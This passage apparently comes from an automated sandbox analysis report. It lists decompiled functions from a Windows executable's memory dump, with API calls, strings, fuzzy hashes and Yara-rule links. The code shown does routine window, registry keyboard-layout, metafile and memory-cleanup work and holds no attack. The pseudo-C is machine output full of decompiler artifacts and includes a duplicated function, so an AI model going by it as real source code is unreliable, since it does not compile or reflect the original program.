0x004335d7
0x004335c5
0x004335c5
0x004335d0
0x004335d0
0x004335da
0x004335da
0x004335de
0x004335e4
0x004335ea
0x004335f0
0x004335f1
0x004335fb
0x004335fc
0x00433601
0x00433605
0x00000000
0x00000000
0x00433613
0x0043361e
0x00433623
0x00433633
0x00433638
0x0043363d
0x0043364a
0x00433675
0x00433688
0x0043368a
0x0043368a
0x00000000
0x00433688
0x0043364c
0x0043365b
0x00000000
0x00000000
0x0043365d
0x00433673
0x00000000
0x00000000
0x00000000
0x00433673
0x00433597
0x0043359d
0x0043359d
0x004335a2
0x00000000
0x00000000
0x0043359b
0x0043359b
0x004335ab
0x00000000
0x004335ab
0x0043353c
0x00433540
0x00000000
0x00433546
0x0043354a
0x0043354a
0x0043354f
0x00000000
0x00000000
0x00433548
0x00433548
0x00433558
0x00000000
0x00433558

APIs

Part of subcall function 00433938: WindowFromPoint.USER32(!8C,?,00000000,0043351A,?,-0000000C,?), ref: 0043393E
Part of subcall function 00433938: GetParent.USER32(00000000), ref: 00433955

GetWindow.USER32(00000000,00000004), ref: 00433522
GetCurrentThreadId.KERNEL32 ref: 004335F6
72E7AC10.USER32(00000000,00433494,?,00000000,00000004,?,-0000000C,?), ref: 004335FC
GetWindowRect.USER32 ref: 00433613
IntersectRect.USER32 ref: 00433681

Part of subcall function 00432A88: GlobalFindAtomA.KERNEL32 ref: 00432A9C
Part of subcall function 00432A88: GetPropA.USER32 ref: 00432AB3

Strings

!8C, xrefs: 00433618, 00433627, 0043361F, 004335DE
!8C, xrefs: 0043350F, 00433587, 004335B0, 004335C5, 00433594

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$AtomCurrentFindFromGlobalIntersectParentPointPropThread
String ID: !8C$!8C
API String ID: 2329882401-3981046368
Opcode ID: fa676e9786b08c1427f105b91fd90f3a84f7ce8e3d6ce7635a4dde1f47aa7685
Instruction ID: 798546eb7c56af2a3b1aeb67f4081dc1a94d0a7f37d7f63404bf358375647fe5
Opcode Fuzzy Hash: fa676e9786b08c1427f105b91fd90f3a84f7ce8e3d6ce7635a4dde1f47aa7685
Instruction Fuzzy Hash: 19515E71A00209AFCB10DF69C885AAEB7F4AF0C355F14916AF804EB351D738EE01CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004556F8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0045570B
GetWindowRect.USER32 ref: 00455765
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045579D
MessageBoxA.USER32 ref: 004557DE
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,00455854,?,00000000,0045584D), ref: 0045582E
SetActiveWindow.USER32(?,00455854,?,00000000,0045584D), ref: 0045583F

Strings

(, xrefs: 00455742

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Active$MessageRect
String ID: (
API String ID: 3147912190-3887548279
Opcode ID: 86071ab3cd418fe90295ada8eec4073c6ff0ce7f9b3593a1bdcbe78333a3d167
Instruction ID: 3249fed73db876156add03284c31224d4e041a1a3b7d85bcb0d763ef76d8db77
Opcode Fuzzy Hash: 86071ab3cd418fe90295ada8eec4073c6ff0ce7f9b3593a1bdcbe78333a3d167
Instruction Fuzzy Hash: 9F412E75E00208AFDB04DBA9DD91FAE77F9EB48304F144569F904EB392D674AD048B54

Uniqueness

Uniqueness Score: -1.00%

Function 004533EC, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004533EC(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x453597);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x45359e);
					return E00404348( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004035AC(1);
					E00404348(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00416804( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00440C78( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E004092C8( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x453553);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E004045B0( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E004045B0(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x45355a);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x004533ed
0x004533ef
0x004533f8
0x004533fe
0x00453403
0x00453404
0x00453409
0x0045340c
0x00453416
0x00453578
0x00453580
0x00453583
0x00453586
0x00453596
0x0045341c
0x0045342b
0x00453434
0x00453447
0x0045344a
0x00453567
0x0045356d
0x00453573
0x00000000
0x00453450
0x00453451
0x0045345a
0x0045345d
0x00453469
0x00000000
0x0045346f
0x00453481
0x00453487
0x004534b1
0x00000000
0x004534b7
0x004534b9
0x004534ba
0x004534bf
0x004534c2
0x004534c5
0x004534eb
0x004534fe
0x00453516
0x00453524
0x00453537
0x00453537
0x00453524
0x0045353e
0x00453541
0x00453544
0x00453552
0x00453552
0x004534b1
0x00000000
0x0045355a
0x0045355a
0x0045355e
0x0045355e
0x0045355e
0x00000000
0x0045345d
0x0045344a
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00453597,?,0241094C,?,004535F9,00000000,?,0043812F), ref: 00453442
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004534AA
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00453553,?,80000002,00000000), ref: 004534E4
RegCloseKey.ADVAPI32(?,0045355A,00000000,?,00000100,00000000,00453553,?,80000002,00000000), ref: 0045354D

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00453494
< A, xrefs: 0045341E
layout text, xrefs: 004534DB

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: < A$System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-3335189974
Opcode ID: d9db98ce08ec88b5d9a534e9a83c208b93b06ac879236cd671b150c032ca47fd
Instruction ID: 2e65fdfe55745ceff13be82c6355dd3b97c10b848e3cf1dae755e39760bd7b2c
Opcode Fuzzy Hash: d9db98ce08ec88b5d9a534e9a83c208b93b06ac879236cd671b150c032ca47fd
Instruction Fuzzy Hash: 66415874A00209AFDB11DF95C981B9EB7F8EB48305F5040A6E904E7392E738EF04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00422CBE, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422CBE(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B5C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421844( &_v38) != _v18) {
					E004209F4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e2f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004209F4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004209F4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E36);
				return E00402774(_v16);
			}

0x00422cc1
0x00422cc3
0x00422ccc
0x00422ccf
0x00422cd2
0x00422cd6
0x00422ce8
0x00422cf2
0x00422d02
0x00422d02
0x00422d07
0x00422d13
0x00422d16
0x00422d24
0x00422d32
0x00422d3c
0x00422d45
0x00422d47
0x00422d47
0x00422d67
0x00422d84
0x00422d87
0x00422d90
0x00422d95
0x00422d9a
0x00422db0
0x00422db2
0x00422db7
0x00422db9
0x00422db9
0x00422dcb
0x00422dd0
0x00422dda
0x00422de0
0x00422de5
0x00422dec
0x00422e04
0x00422e06
0x00422e0b
0x00422e0d
0x00422e0d
0x00422e12
0x00422e18
0x00422e1b
0x00422e1e
0x00422e2e

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D62
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D7F
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DAB
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DCB
DeleteEnhMetaFile.GDI32(00000016), ref: 00422DEC
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422DFF

Strings

`, xrefs: 00422D47

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: e63a1a3a43b83e3cbd33f10dbe18aee8be931b9a4042a572ded0eb96ca236cb4
Instruction ID: f4c7e7fd51bcff73823d959541a8f6c0f0ac619ab67172c73a204e50a8050bbf
Opcode Fuzzy Hash: e63a1a3a43b83e3cbd33f10dbe18aee8be931b9a4042a572ded0eb96ca236cb4
Instruction Fuzzy Hash: EE414F75E00218AFDB00DFA9D585AAEB7F9EF48700F51846AF404FB241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422CC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422CC0(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E00422B5C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00421844( &_v38) != _v18) {
					E004209F4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E00402754(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e2f, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004209F4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004209F4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E36);
				return E00402774(_v16);
			}

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D62
MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D7F
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DAB
GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DCB
DeleteEnhMetaFile.GDI32(00000016), ref: 00422DEC
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422DFF

Strings

`, xrefs: 00422D47

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMeta$Bits$DeleteHeader
String ID: `
API String ID: 1990453761-2679148245
Opcode ID: f5807bf5fa57431a72959c85d03c8ee9a922c71f380b6236da7365d442ae4229
Instruction ID: c590c56c1f031b292e49777252285adf31a43198c0916b56b962210586fef7b4
Opcode Fuzzy Hash: f5807bf5fa57431a72959c85d03c8ee9a922c71f380b6236da7365d442ae4229
Instruction Fuzzy Hash: 73414EB5E00218AFDB00DFA9D585AAEB7F9EF48700F51846AF404FB241E7789D40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004274C4, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004274C4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x492ac8 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					 *0x492aac = E00427194(4, _t23,  *0x492aac, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}

0x004274cd
0x004274d0
0x004274da
0x004274ff
0x00427507
0x00427527
0x0042752c
0x00427537
0x00427542
0x0042754c
0x0042754d
0x0042754e
0x0042754f
0x00427550
0x00427551
0x0042755b
0x0042755d
0x00427565
0x00427566
0x00427566
0x0042756b
0x0042756b
0x004274dc
0x004274ee
0x004274fb
0x004274fb
0x00427575

APIs

GetMonitorInfoA.USER32(?,?), ref: 004274F5
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042751C
GetSystemMetrics.USER32 ref: 00427531
GetSystemMetrics.USER32 ref: 0042753C
lstrcpy.KERNEL32(?,DISPLAY), ref: 00427566

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

GetMonitorInfo, xrefs: 004274DC
DISPLAY, xrefs: 0042755D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: ad86f94aae28ebdc367ced31ca138b3fcb15e76b48007f919251a55fb91822f8
Instruction ID: c05d84078003b73aaf7fe4671f1af9ecff2027ce181741867db3bdfb618d697c
Opcode Fuzzy Hash: ad86f94aae28ebdc367ced31ca138b3fcb15e76b48007f919251a55fb91822f8
Instruction Fuzzy Hash: 3311C3327047217FD720DF62AC80767F7A9AF05750F40493BEC0997B40D3B8A4808BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042766C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0042766C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x492aca != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x492ab4; // 0x42766c
					 *0x492ab4 = E00427194(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x492ab4(_t27, _t29);
				}
				return _t24;
			}

0x00427675
0x00427678
0x00427682
0x004276a7
0x004276af
0x004276cf
0x004276d4
0x004276df
0x004276ea
0x004276f4
0x004276f5
0x004276f6
0x004276f7
0x004276f8
0x004276f9
0x00427703
0x00427705
0x0042770d
0x0042770e
0x0042770e
0x00427713
0x00427713
0x00427684
0x00427689
0x00427696
0x004276a3
0x004276a3
0x0042771d

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004276C4
GetSystemMetrics.USER32 ref: 004276D9
GetSystemMetrics.USER32 ref: 004276E4
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042770E

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

GetMonitorInfoW, xrefs: 00427684
lvB, xrefs: 00427689, 00427696, 0042769D
DISPLAY, xrefs: 00427705

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW$lvB
API String ID: 2545840971-4029388103
Opcode ID: 7c3a3995aefbc19850da687c4b1a5e3f410e81b961ca425f3fe60b983d4dc96e
Instruction ID: c18707be004a8e06ee07ba6e8d4ffe71520b8a8fc7dafdccaf32e8c0190fd5f7
Opcode Fuzzy Hash: 7c3a3995aefbc19850da687c4b1a5e3f410e81b961ca425f3fe60b983d4dc96e
Instruction Fuzzy Hash: D2110332704720AFD720CF61AD457A7B7E9EB85354F40483BEC4997691E3B4B804CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401B64, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401B64() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4925bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x492049 != 0) {
						_push(0x4925c4);
						L004013FC();
					}
					 *0x4925bc = 0;
					_t3 =  *0x49261c; // 0x51cb40
					LocalFree(_t3);
					 *0x49261c = 0;
					_t19 =  *0x4925e4; // 0x51b474
					while(_t19 != 0x4925e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401464(0x4925e4);
					E00401464(0x4925f4);
					E00401464(0x492620);
					_t14 =  *0x4925dc; // 0x51ae40
					while(_t14 != 0) {
						 *0x4925dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4925dc; // 0x51ae40
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c41);
					if( *0x492049 != 0) {
						_push(0x4925c4);
						L00401404();
					}
					_push(0x4925c4);
					L0040140C();
					return 0;
				}
			}

0x00401b65
0x00401b6f
0x00401c43
0x00401b75
0x00401b77
0x00401b78
0x00401b7d
0x00401b80
0x00401b8a
0x00401b8c
0x00401b91
0x00401b91
0x00401b96
0x00401b9d
0x00401ba3
0x00401baa
0x00401baf
0x00401bc9
0x00401bc2
0x00401bc7
0x00401bc7
0x00401bd6
0x00401be0
0x00401bea
0x00401bef
0x00401bf6
0x00401bfa
0x00401c01
0x00401c06
0x00401c0b
0x00401c11
0x00401c14
0x00401c17
0x00401c23
0x00401c25
0x00401c2a
0x00401c2a
0x00401c2f
0x00401c34
0x00401c39
0x00401c39

APIs

RtlEnterCriticalSection.KERNEL32(004925C4,00000000,1!), ref: 00401B91
LocalFree.KERNEL32(0051CB40,00000000,1!), ref: 00401BA3
VirtualFree.KERNEL32(?,00000000,00008000,0051CB40,00000000,1!), ref: 00401BC2
LocalFree.KERNEL32(0051AE40,?,00000000,00008000,0051CB40,00000000,1!), ref: 00401C01
RtlLeaveCriticalSection.KERNEL32(004925C4,00401C41,0051CB40,00000000,1!), ref: 00401C2A
RtlDeleteCriticalSection.KERNEL32(004925C4,00401C41,0051CB40,00000000,1!), ref: 00401C34

Strings

1!, xrefs: 00401B78

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: 1!
API String ID: 3782394904-1845855088
Opcode ID: 0dc971edaac5e3fa23cc0fe98fdc44acbf7b818b47f1c9225f4ab5b1a7a832e9
Instruction ID: 8791097a756066d2a2b1b9dd3d3da6b1873c49361a0662bae4c8a8f8b36b9a23
Opcode Fuzzy Hash: 0dc971edaac5e3fa23cc0fe98fdc44acbf7b818b47f1c9225f4ab5b1a7a832e9
Instruction Fuzzy Hash: C911E2706487807FEB15EB669EA1F167B95A314718F05803BF004A66F2D6FC9C44CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00452234, Relevance: 12.1, APIs: 8, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

